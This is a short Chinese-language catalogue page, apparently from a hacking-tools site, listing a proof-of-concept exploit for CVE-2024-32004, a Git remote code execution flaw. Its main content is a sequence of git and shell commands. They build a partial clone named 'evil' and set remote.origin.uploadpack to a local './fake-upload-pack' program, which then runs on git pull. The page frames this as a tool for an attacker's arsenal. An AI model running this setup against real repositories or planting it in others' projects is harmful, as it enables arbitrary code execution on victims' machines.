黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对CVE-2024-32004的概念验证漏洞利用程序,这是一个Git远程代码执行漏洞,演示了如何通过恶意的upload-pack过滤器进行利用。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
git init tmp
git -C tmp config uploadpack.allowfilter 1
git clone --filter=blob:none --no-local --no-checkout tmp evil
rm -rf tmp
git -C evil config remote.origin.uploadpack "./fake-upload-pack"
git pull